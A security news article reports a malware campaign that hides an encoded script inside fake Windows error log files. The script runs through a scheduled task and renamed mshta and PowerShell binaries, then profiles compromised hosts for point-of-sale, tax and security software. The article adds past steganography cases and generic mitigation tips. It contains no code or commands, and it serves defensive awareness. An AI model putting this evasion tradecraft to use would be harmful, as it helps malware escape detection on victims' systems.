Recently, security researchers discovered hackers usage of fake Windows error logs to hide malicious payload. Read on to know more…
Hackers have continued to devise new techniques to avoid detection. Recently, security researchers discovered a peculiar way to hide malicious payload in plain sight, and this method is actively used in the wild. Hackers have been observed using fake error logs to store ASCII characters disguised as hexadecimal values that decode to a malicious payload designed to prepare the ground for script-based attacks.
Hiding Details
To develop and execute their tradecraft, the malware authors this time used new tricks related to error logs to hide in plain sight a new sophisticated attack. Researchers discovered the attack that included tricks such as renaming legitimate files, masquerading as an existing scheduled task, and using a malicious payload stored in a file made to look like an error log to hide in plain sight. The error log files contained timestamps and references to OS 6.2, Windows internal version number for Windows 8, and Windows Server 2012. The final payload is used to collect details about the compromised host, installed applications specifically PoS software, financial applications, browsers, tax software (Lacerte and ProSeries), security products (Kaspersky, Comodo, Defender), IP addresses, administrative privileges, etc.
Working Mechanism
Security researchers discovered that cybercriminals applied a new method after they compromised systems and achieved persistence. Then they used a file with a .chk extension that imitated a Windows error log for an application. At first glimpse, the file is not suspicious, since it has timestamps and includes references to the internal version number for Windows, but at the end of each line is a decimal representation of ASCII character. Such a file will not cause suspicion of security solutions, and the user will consider it legitimate, in fact, this fake error log hides an encoded script that contacts the command and control server for the next step in the attack. The script is run using a scheduled task and two renamed legitimate windows binaries: mshta.exe and powershell.exe. Attackers use the script to collect details about installed browsers, security products, and point-of-sale software. Exclusive threat hunting rule developed by Osman Demir helps security solutions to find fake windows error logs containing malicious payloads.
Evasion Techniques in the Past
In the past attacks also, hackers have been observed using steganography and other sly techniques to hide malicious code inside legitimate looking files. In June 2020, Tycoon ransomware was observed hiding its payload in a Java image file to prevent detection on Windows and Linux systems and target corporate networks. In May 2020, attackers targeted victims in Japan, the U.K., Germany, Italy, and delivered malicious PowerShell scripts hidden in image files to steal employee credentials from organizations tied to the industrial sector. In the same month, the Tropic Trooper group used steganography techniques to mask their backdoor routines and evade anti-malware and network perimeter detection.
Mitigation
Users should use threat intelligence to stay current with steganographic and other threats. Expedite and prioritize vulnerability patches, updates, and policy controls. Also protect networks against application exploits, malicious software, botnets, and zero-day vulnerabilities.
